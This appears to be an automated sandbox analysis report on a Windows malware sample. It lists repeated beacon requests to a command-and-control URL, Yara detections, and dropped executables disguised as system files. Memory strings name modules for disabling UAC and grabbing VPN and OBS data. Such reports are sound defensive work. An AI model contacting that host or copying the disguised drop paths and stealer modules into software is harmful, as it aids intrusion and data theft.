Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: arabna4a.beget.tech
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: arabna4a.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: arabna4a.beget.tech

Source: global traffic

DNS traffic detected: DNS query: arabna4a.beget.tech

Source: ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000366A000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003674000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000363E000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://arabna4a.beget.tech
Source: ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003631000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://arabna4a.beget.tech/
Source: ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000363E000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f
Source: svchost.exe, 00000039.00000003.1339338983.000002A4B48D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001A.00000002.1542277018.0000014015FC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.0000011899C06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F002E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.000002398904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9D1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.0000000003763000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1542277018.0000014015DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.00000118999E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.0000023988DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9CFB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E72E2000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000363E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.1542277018.0000014015FC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.0000011899C06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F002E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.000002398904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9D1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.1542277018.0000014015DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.00000118999E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.0000023988DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9CFB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E72E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000039.00000003.1339338983.000002A4B4929000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000039.00000003.1339338983.000002A4B48D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.cvXu2RR10n.exe.3454e20.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
Source: 50.2.ApplicationFrameHost.exe.34069c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\DigitalLocker\en-US\7aa03be75bb09d	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\SystemTemp\Crashpad\attachments\9e8d7a4ca61bd9	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC463595	0_2_00007FFAAC463595
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC476CF1	0_2_00007FFAAC476CF1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC475E91	0_2_00007FFAAC475E91
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC470725	0_2_00007FFAAC470725
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC4722D0	0_2_00007FFAAC4722D0
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC4737B8	0_2_00007FFAAC4737B8
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC471C0B	0_2_00007FFAAC471C0B
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC474709	0_2_00007FFAAC474709
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC481340	0_2_00007FFAAC481340
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC474348	0_2_00007FFAAC474348
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC474838	0_2_00007FFAAC474838
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC4744B8	0_2_00007FFAAC4744B8
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Code function: 60_2_00007FFAAC463595	60_2_00007FFAAC463595
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Code function: 60_2_00007FFAAC4699E1	60_2_00007FFAAC4699E1

Source: cvXu2RR10n.exe	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: smartscreen.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vAJjQbsDlJtvByBkfqttADkNAptf.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ApplicationFrameHost.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vAJjQbsDlJtvByBkfqttADkNAptf.exe0.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RuntimeBroker.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe.50.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: cvXu2RR10n.exe, 00000000.00000002.1315157416.00000000032D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameOBSGrabber.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1744856741.000000001C714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.0000000003517000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1686133974.000000001BBE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.0000000003473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBSoDProtection.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.0000000003473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.0000000003473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1312936692.0000000003130000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000355E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1310287651.0000000003110000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1303323372.0000000001800000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1364796894.00000000139D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1319381170.00000000032E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1303852993.00000000030C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.00000000034AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1305814028.00000000030F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1685562165.000000001BBD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1311354228.0000000003120000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.00000000034D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.00000000034D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOBSGrabber.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000000.1259423666.0000000000DF4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1304474259.00000000030E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBSoDProtection.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1324424912.00000000032F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1327020968.0000000003310000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDCLIB.dll, vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1325546443.0000000003300000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDCLIB.dll, vs cvXu2RR10n.exe
